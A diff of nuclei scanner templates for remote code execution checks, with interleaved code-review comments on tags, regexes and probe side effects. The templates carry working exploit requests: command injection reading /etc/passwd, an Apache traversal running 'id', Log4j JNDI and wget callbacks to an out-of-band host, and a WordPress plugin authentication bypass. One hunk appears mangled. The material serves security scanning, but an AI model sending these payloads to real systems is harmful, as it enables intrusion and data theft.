diff --git a/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml b/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml index 38e6e72150..cc0303645c 100644 --- a/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml +++ b/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml @@ -1,19 +1,21 @@ id: hashicorp-consul-rce info: - name: Hashicorp Consul Services Api RCE + name: Hashicorp Consul Services API - Remote Code Execution author: pikpikcu severity: critical - reference: https://www.exploit-db.com/exploits/46074 - tags: hashicorp,rce,oob + description: Hashicorp Consul Services API is vulnerable to an attack that can be leveraged to gaino remote command execution on Consul nodes. + reference: + - https://www.exploit-db.com/exploits/46074 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: hashicorp,rce,oast,intrusive requests: - raw: - | # Create USER PUT /v1/agent/service/register HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 205 { "ID": "{{randstr}}", @@ -31,3 +33,5 @@ requests: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + +# Enhanced by mp on 2022/06/01 diff --git a/poc/remote_code_execution/hashicorp-consul-rce.yaml b/poc/remote_code_execution/hashicorp-consul-rce.yaml index 0c4b432be5..d69e9f5708 100644 --- a/poc/remote_code_execution/hashicorp-consul-rce.yaml +++ b/poc/remote_code_execution/hashicorp-consul-rce.yaml 
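Review bot: The `description` added in the `hashicorp-consul-rce-7890.yaml` hunk contains the typo `gaino` ("leveraged to gaino remote command execution"); it should read `gain`. This file and `hashicorp-consul-rce.yaml` both declare `id: hashicorp-consul-rce`, and the patch leaves them with diverging tags (`oast,intrusive` here, `oob` there). Results and tag filters for the same id will then be inconsistent, so one of the two files should be renamed or dropped.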
@@ -1,16 +1,21 @@ id: hashicorp-consul-rce + info: name: Hashicorp Consul Services Api RCE author: pikpikcu severity: critical - reference: - - https://www.exploit-db.com/exploits/46074 - tags: hashicorp,rce,oast,intrusive + reference: https://www.exploit-db.com/exploits/46074 + tags: hashicorp,rce,oob + requests: - raw: - | # Create USER PUT /v1/agent/service/register HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Length: 205 { "ID": "{{randstr}}", @@ -23,6 +28,7 @@ requests: "Timeout": "86400s" } } + matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction diff --git a/poc/remote_code_execution/hiboss-rce-7945.yaml b/poc/remote_code_execution/hiboss-rce-7945.yaml index 827e35bc3b..8e6c523e36 100644 --- a/poc/remote_code_execution/hiboss-rce-7945.yaml +++ b/poc/remote_code_execution/hiboss-rce-7945.yaml @@ -1,15 +1,11 @@ id: hiboss-rce info: - name: Hiboss - Remote Code Execution + name: Hiboss RCE author: pikpikcu severity: critical - description: HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter. + description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter. reference: - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: hiboss,rce requests: - raw: 
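Review bot: The first `hashicorp-consul-rce.yaml` hunk adds a hard-coded `Content-Length: 205` to a raw request whose JSON body contains `{{randstr}}`, so the declared length will generally not match the rendered body and the agent may truncate the request or wait on it. I would drop the added `Content-Length`, `Connection` and `Upgrade-Insecure-Requests` lines and let the engine compute the length. The hunk also replaces `tags: hashicorp,rce,oast,intrusive` with `tags: hashicorp,rce,oob`. The request is a `PUT /v1/agent/service/register`, which changes state on the agent, so `intrusive` should stay so that scans excluding state-changing templates keep skipping it. The request body continues outside the first hunk.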
@@ -28,5 +24,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/06/03 diff --git a/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml b/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml index caa8758541..a7494e8328 100644 --- a/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml +++ b/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml @@ -1,12 +1,11 @@ id: icewarp-webclient-rce - info: name: IceWarp WebClient RCE author: gy741 severity: critical + reference: + - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E tags: icewarp,rce - reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E - requests: - raw: - | @@ -15,14 +14,12 @@ requests: Content-Type: application/x-www-form-urlencoded _dlg[captcha][target]=system(\'ver\')\ - matchers-condition: and matchers: - type: word words: - "Microsoft Windows [Version" part: body - - type: status status: - 302 diff --git a/poc/remote_code_execution/metersphere-plugin-rce.yaml b/poc/remote_code_execution/metersphere-plugin-rce.yaml index 78b6fd5836..6a7a2bac58 100644 --- a/poc/remote_code_execution/metersphere-plugin-rce.yaml +++ b/poc/remote_code_execution/metersphere-plugin-rce.yaml @@ -3,10 +3,10 @@ info: name: MeterSphere Plugin Pre-auth RCE author: pdteam,y4er severity: critical - tags: metersphere,rce,intrusive reference: - https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/ - https://github.com/metersphere/metersphere + tags: metersphere,rce,intrusive requests: - raw: - | diff --git a/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml b/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml index d6fe1d8eb4..b66890728d 100644 --- a/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml +++ b/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml 
@@ -1,4 +1,5 @@ id: mobileiron-log4j-jndi-rce + info: name: MobileIron Log4J JNDI RCE author: meme-lord @@ -10,6 +11,7 @@ info: - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a - https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron tags: rce,jndi,oast,log4j,mobileiron + requests: - raw: - | @@ -18,19 +20,22 @@ requests: Content-Type: application/x-www-form-urlencoded j_username=${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + - type: regex part: interactsh_request regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/poc/remote_code_execution/natshell-rce.yaml b/poc/remote_code_execution/natshell-rce.yaml index a9cb6aa19c..2b7a5614d1 100644 --- a/poc/remote_code_execution/natshell-rce.yaml +++ b/poc/remote_code_execution/natshell-rce.yaml @@ -1,26 +1,22 @@ id: natshell-rce - info: name: NatShell Debug File RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + reference: + - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw tags: natshell,rce - requests: - method: POST path: - "{{BaseURL}}/debug.php" body: | cmd=cat /etc/passwd - matchers-condition: and matchers: - - type: regex regex: - "toor:[x*]:0:0" - - type: status status: - 200 
diff --git a/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml b/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml index cc1d3a4837..2d962b0a96 100644 --- a/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml +++ b/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml @@ -1,11 +1,8 @@ id: pdf-signer-ssti-to-rce - info: name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie author: madrobot severity: high - description: todo - requests: - method: GET path: diff --git a/poc/remote_code_execution/phalcon-framework-source.yaml b/poc/remote_code_execution/phalcon-framework-source.yaml index 0e2270201c..179a41795e 100644 --- a/poc/remote_code_execution/phalcon-framework-source.yaml +++ b/poc/remote_code_execution/phalcon-framework-source.yaml @@ -1,9 +1,8 @@ id: phalcon-framework-source info: - name: Phalcon Framework - Source Code Leakage + name: Phalcon Framework Source Code leakage author: philippedelteil severity: high - description: Phalcon Framework source code was discovered. tags: exposure,debug,phalcon requests: - method: GET @@ -20,5 +19,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml b/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml index 9ddbab9b4c..aae82c8c57 100644 --- a/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml 
@@ -1,35 +1,33 @@ id: qi-anxin-netkang-next-generation-firewall-rce + info: - name: Qi'anxin Netkang Next Generation Firewall - Remote Code Execution + name: Qi'anxin Netkang Next Generation Firewall RCE author: pikpikcu severity: critical - description: | - Qi'anxin Netkang Next Generation Firewall is susceptible to remote code execution. - reference: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: rce,firewall,intrusive + reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + tags: rce + requests: - raw: - | POST /directdata/direct/router HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 + Content-Length: 178 - {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;touch /var/www/html/{{randstr}}.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} + {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} - | - GET /{{randstr}}.txt HTTP/1.1 + GET /poc.txt HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 + matchers-condition: and matchers: - type: regex - part: body regex: - - "root:.*:0:0:" + - "root:.*:0:0" + part: body + - type: status status: - 200 - -# Enhanced by mp on 2022/05/30 diff --git a/poc/remote_code_execution/rce-cve-2021-41773.yaml b/poc/remote_code_execution/rce-cve-2021-41773.yaml index 87e89bc5e2..f8fd2f8e57 100644 --- a/poc/remote_code_execution/rce-cve-2021-41773.yaml +++ b/poc/remote_code_execution/rce-cve-2021-41773.yaml 
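Review bot: The new probe in this hunk leaves sensitive data behind on a vulnerable host: instead of creating an empty marker named `{{randstr}}.txt`, it copies `/etc/passwd` into a fixed, web-readable `poc.txt`, and nothing in the template removes it. That turns a scan into a lasting information disclosure on the scanned asset. The fixed name also means a stale file from an earlier run still matches after the device is patched. I would keep the random marker name and match on a benign marker string rather than on passwd content, and keep `intrusive` in `tags` (the hunk reduces them to `rce`) so the template stays out of non-intrusive runs. The added `Content-Length: 178` and browser `User-Agent` headers are unnecessary; the length should be left to the engine.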
@@ -1,51 +1,16 @@ id: CVE-2021-41773 - info: - name: Apache 2.4.49 - Path Traversal and Remote Code Execution - author: daffainfo - severity: high - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. - reference: - - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773 - - https://twitter.com/ptswarm/status/1445376079548624899 - - https://twitter.com/h4x0r_dz/status/1445401960371429381 - - https://github.com/blasty/CVE-2021-41773 - remediation: Update to Apache HTTP Server 2.4.50 or later. 
- classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41773 - cwe-id: CWE-22 - metadata: - shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49 - tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,cisa - + name: RCE in Apache HTTP Server 2.4.49 + author: RafaelCaria + severity: critical + tags: cve,cve2021,rce requests: - - raw: - - | - GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 - Host: {{Hostname}} - - - | - POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev - - matchers-condition: or + - method: POST + path: + - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' + body: 'echo;id' matchers: - - type: regex - name: LFI + part: body regex: - - "root:.*:0:0:" - - - type: word - name: RCE - words: - - "CVE-2021-41773-POC" - -# Enhanced by mp on 2022/02/27 + - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b" diff --git a/poc/remote_code_execution/rconfig-rce.yaml b/poc/remote_code_execution/rconfig-rce.yaml index 207517a711..3ebb60b6c5 100644 --- a/poc/remote_code_execution/rconfig-rce.yaml +++ b/poc/remote_code_execution/rconfig-rce.yaml 
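Review bot: The regex added at the end of the `rce-cve-2021-41773.yaml` hunk sits in a double-quoted YAML scalar, where `\b` is the backspace escape rather than a regex word boundary, so the `bytes from …` alternative can only match text containing literal 0x08 characters. Writing the pattern in single quotes, e.g. `- '(uid|gid|groups)=\d+'`, avoids the escape problem. The `bytes from` branch can go as well, since the `echo;id` body never produces ping output. The new side also has no status matcher and drops the `description`, `remediation` and `classification` blocks while raising `severity` to `critical`. Keeping the remediation text ("Update to Apache HTTP Server 2.4.50 or later") is what makes the finding actionable for whoever receives it. The hunk starts on the previous line of this page.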
@@ -1,22 +1,14 @@ id: rconfig-rce - info: - name: rConfig 3.9.5 - Arbitrary File Upload + name: rConfig 3.9.5 - Remote Code Execution author: dwisiswant0 severity: high - description: rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cwe-id: CWE-434 + tags: rconfig,rce + description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint. reference: - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.exploit-db.com/exploits/48878 - tags: rconfig,rce,edb - metadata: - max-request: 1 - -http: +requests: - raw: - | POST /lib/crud/userprocess.php HTTP/1.1 @@ -54,16 +46,12 @@ http: 9 --01b28e152ee044338224bf647275f8eb-- - matchers-condition: and matchers: - type: word words: - "User {{randstr}} successfully added to Database" - part: body - type: status status: - 302 - -# Enhanced by md on 2022/10/05 diff --git a/poc/remote_code_execution/salesforce-aura-9981.yaml b/poc/remote_code_execution/salesforce-aura-9981.yaml index 1fd9a804b6..b6c85071b2 100644 --- a/poc/remote_code_execution/salesforce-aura-9981.yaml +++ b/poc/remote_code_execution/salesforce-aura-9981.yaml @@ -4,7 +4,7 @@ info: author: aaron_costello (@ConspiracyProof) severity: info reference: https://www.enumerated.de/index/salesforce - tags: aura,unauth,salesforce,exposure + tags: aura,unauth,salesforce requests: - method: POST path: @@ -14,6 +14,6 @@ requests: body: "{}" matchers: - type: word - part: body words: - 'aura:invalidSession' + part: body 
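Review bot: The `-http:` / `+requests:` swap at the end of the first rconfig hunk moves this template back to the legacy top-level key, while the wp-woocommerce-email-verification hunk in the same patch goes the other way (`requests:` to `http:`), so the repository ends up carrying both schemas. The sangfor-edr-rce hunk makes the same swap and also drops `max-request: 1`. I would keep `http:` in both; if the older key is deliberate, record why with a comment such as `# legacy 'requests:' key kept for older nuclei engines`. The hunk additionally removes the `classification` block (CVSS 8.8, CWE-434) while leaving `severity: high`, so the rating loses its stated basis.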
diff --git a/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml b/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml index eeec0fe91a..fdd06e0395 100644 --- a/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml +++ b/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml @@ -1,10 +1,15 @@ id: samsung-wlan-ap-rce info: - name: Samsung Wlan AP (WEA453e) RCE + name: Samsung WLAN AP WEA453e - Remote Code Execution author: pikpikcu severity: critical + description: Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in. reference: - - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + - https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: xss,samsung,rce requests: - method: POST @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/31 diff --git a/poc/remote_code_execution/sangfor-edr-rce-10030.yaml b/poc/remote_code_execution/sangfor-edr-rce-10030.yaml index c51500b87d..1952c84b15 100644 --- a/poc/remote_code_execution/sangfor-edr-rce-10030.yaml +++ b/poc/remote_code_execution/sangfor-edr-rce-10030.yaml @@ -1,5 +1,4 @@ id: sangfor-edr-rce - info: name: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution author: pikpikcu @@ -12,11 +11,9 @@ info: cvss-score: 10.0 cwe-id: CWE-77 metadata: - max-request: 1 fofa-query: app="sangfor" tags: rce,sangfor - -http: +requests: - method: POST path: - "{{BaseURL}}/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9" @@ -24,14 +21,12 @@ http: Content-Type: application/x-www-form-urlencoded body: | {"params":"w=123\"'1234123'\"|cat /etc/passwd"} - matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - - type: status status: - 200 
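Review bot: `tags: xss,samsung,rce` is left unchanged directly under the new `classification` block in the samsung-wlan-ap-rce hunk, which now declares `cwe-id: CWE-77`; the `xss` tag contradicts it. Tags are how operators scope a scan, so a run limited to XSS checks would still send this critical command-execution probe to the device. I would change the line to `tags: samsung,rce`. The request body is outside the hunk, so confirm nothing there justifies the XSS label.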
diff --git a/poc/remote_code_execution/sar2html-rce-10082.yaml b/poc/remote_code_execution/sar2html-rce-10082.yaml index 24a127592a..c32fd046bb 100644 --- a/poc/remote_code_execution/sar2html-rce-10082.yaml +++ b/poc/remote_code_execution/sar2html-rce-10082.yaml @@ -1,5 +1,4 @@ id: sar2html-rce - info: name: sar2html 3.2.1 - 'plot' Remote Code Execution author: gy741 @@ -7,14 +6,12 @@ info: description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. reference: https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oast - requests: - raw: - | GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Accept: */* - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction diff --git a/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml b/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml index 574d070ebd..2cfcddd5ab 100644 --- a/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml +++ b/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml @@ -1,12 +1,11 @@ id: showdoc-file-upload-rce - info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu severity: critical - reference: https://github.com/star7th/showdoc/pull/1059 + reference: + - https://github.com/star7th/showdoc/pull/1059 tags: rce,fileupload,showdoc - requests: - raw: - | @@ -20,7 +19,6 @@ requests: ----------------------------835846770881083140190633-- - matchers-condition: and matchers: - type: word @@ -28,12 +26,10 @@ requests: - '"url":"http:' - '"success":1' condition: and - - type: status status: - 200 - extractors: - type: json json: - - '.url' \ No newline at end of file + - '.url' 
diff --git a/poc/remote_code_execution/springboot-log4j-rce.yaml b/poc/remote_code_execution/springboot-log4j-rce.yaml index 28f847f7e4..4286931f8d 100644 --- a/poc/remote_code_execution/springboot-log4j-rce.yaml +++ b/poc/remote_code_execution/springboot-log4j-rce.yaml @@ -1,10 +1,9 @@ id: springboot-log4j-rce info: - name: Spring Boot - Remote Code Execution (Apache Log4j) + name: Spring Boot Log4j Remote Code Injection author: pdteam severity: critical - description: Spring Boot is susceptible to remote code execution via Apache Log4j. reference: - https://logging.apache.org/log4j/2.x/security.html - https://www.lunasec.io/docs/blog/log4j-zero-day/ @@ -45,6 +44,4 @@ requests: part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - -# Enhanced by mp on 2022/05/31 + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/poc/remote_code_execution/tamronos-rce.yaml b/poc/remote_code_execution/tamronos-rce.yaml index 9a9e405787..03c27beac8 100644 --- a/poc/remote_code_execution/tamronos-rce.yaml +++ b/poc/remote_code_execution/tamronos-rce.yaml @@ -1,19 +1,24 @@ id: tamronos-rce + info: name: TamronOS IPTV/VOD RCE author: pikpikcu severity: critical reference: https://twitter.com/sec715/status/1405336456923471874 tags: tamronos,rce + requests: - method: GET path: - "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 diff --git a/poc/remote_code_execution/thinkcmf-rce-10727.yaml b/poc/remote_code_execution/thinkcmf-rce-10727.yaml index 715539039f..0173c895e9 100644 --- a/poc/remote_code_execution/thinkcmf-rce-10727.yaml +++ b/poc/remote_code_execution/thinkcmf-rce-10727.yaml 
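Review bot: In the tamronos-rce hunk the passwd matcher is loosened from `"root:.*:0:0:"` to `"root:.*:0:0"`, which diverges from the `root:.*:0:0:` pattern that the sangfor-edr-rce and yapi-rce templates in this patch keep. Without the trailing colon the pattern no longer requires the field separator after the GID, so it accepts more non-passwd text for no gain in coverage. I would restore `- "root:.*:0:0:"` and add `part: body` to the matcher so its scope is explicit.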
@@ -6,18 +6,19 @@ info: reference: https://www.freebuf.com/vuls/217586.html tags: thinkcmf,rce requests: - - raw: - - | - GET /index.php?a=fetch&content={{url_encode('/Isc/third-party/httpd/htdocs/test.txt;" - "{{BaseURL}}/test.txt" - matchers-condition: and matchers: - type: status diff --git a/poc/remote_code_execution/webui-rce.yaml b/poc/remote_code_execution/webui-rce.yaml index 09b1d2e004..372b5a39ce 100644 --- a/poc/remote_code_execution/webui-rce.yaml +++ b/poc/remote_code_execution/webui-rce.yaml @@ -1,21 +1,32 @@ id: webui-rce + info: - name: WebUI 1.5b6 RCE + name: WebUI 1.5b6 - Remote Code Execution author: pikpikcu severity: critical - description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. - reference: https://www.exploit-db.com/exploits/36821 + description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter. + reference: + - https://www.exploit-db.com/exploits/36821 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: webui,rce + requests: - method: GET path: - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' + matchers-condition: and matchers: - type: word words: - "c5b3d7397a90f42d222f7ed9408c0dc6" part: body + - type: status status: - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml b/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml index b4c420c7dc..e4393fb210 100644 --- a/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml +++ b/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml 
@@ -1,29 +1,46 @@ id: wp-woocommerce-email-verification + info: - name: wordpress-emails-verification-for-woocommerce - author: random-robbie + name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass + author: random_robbie,daffianfo severity: critical - tags: wordpress,wp-plugin - - # Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass - # https://wpvulndb.com/vulnerabilities/10318 - # GDPR plugin may give a false positive so double check headers + description: | + Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator. + reference: + - https://wpvulndb.com/vulnerabilities/10318 + - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-288 + metadata: + max-request: 2 + tags: woocommerce,wp,wpscan,wordpress,wp-plugin -requests: +http: - method: GET path: + - "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" + + stop-at-first-match: true matchers-condition: and matchers: + - type: regex + part: header + regex: + - "wordpress_logged_in_[a-z0-9]{32}" + - type: word + part: body words: - - "wordpress_logged_in" - part: header + - "Your account has been activated!" + - "From your account dashboard you can view your" + condition: and - type: status status: - - 401 - - 403 - negative: true \ No newline at end of file + - 200 + +# digest: 4b0a00483046022100987033fa8b4186e78f6073527adcb6730eff184c2fd886cdec3f48e798b7f2d9022100faad5d8bc5339281f3b2e3cb1b0687a22e516ae19dc3c5087a64427c7ed68066:922c64590222798bb761d5b6d8e72950 
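Review bot: The new `tags: woocommerce,wp,wpscan,wordpress,wp-plugin` line omits `intrusive`, although a match now requires a `wordpress_logged_in_[a-z0-9]{32}` cookie plus the "Your account has been activated!" page, meaning the request changed state on the site and the scanner was handed a session. The simplefilelist template in this patch adds `intrusive` for its state-changing requests; I would add it here too, e.g. `tags: woocommerce,wp,wpscan,wordpress,wp-plugin,intrusive`, and treat any stored response for this finding as containing a live session cookie. Separately, `author: random_robbie,daffianfo` looks like a misspelling of `daffainfo`, the handle used elsewhere in this patch.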
diff --git a/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml b/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml index 804afc6b74..d50fb50d35 100644 --- a/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml +++ b/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml @@ -1,4 +1,5 @@ id: wordpress-rce-simplefilelist + info: name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE author: princechaddha @@ -6,15 +7,14 @@ info: reference: https://wpscan.com/vulnerability/10192 description: | The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - tags: wordpress,wp-plugin,rce + tags: wordpress,wp-plugin,rce,intrusive,upload,python + requests: - raw: - | POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - Content-Length: 693 Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2 --6985fa39c0698d07f6d418b37388e1b2 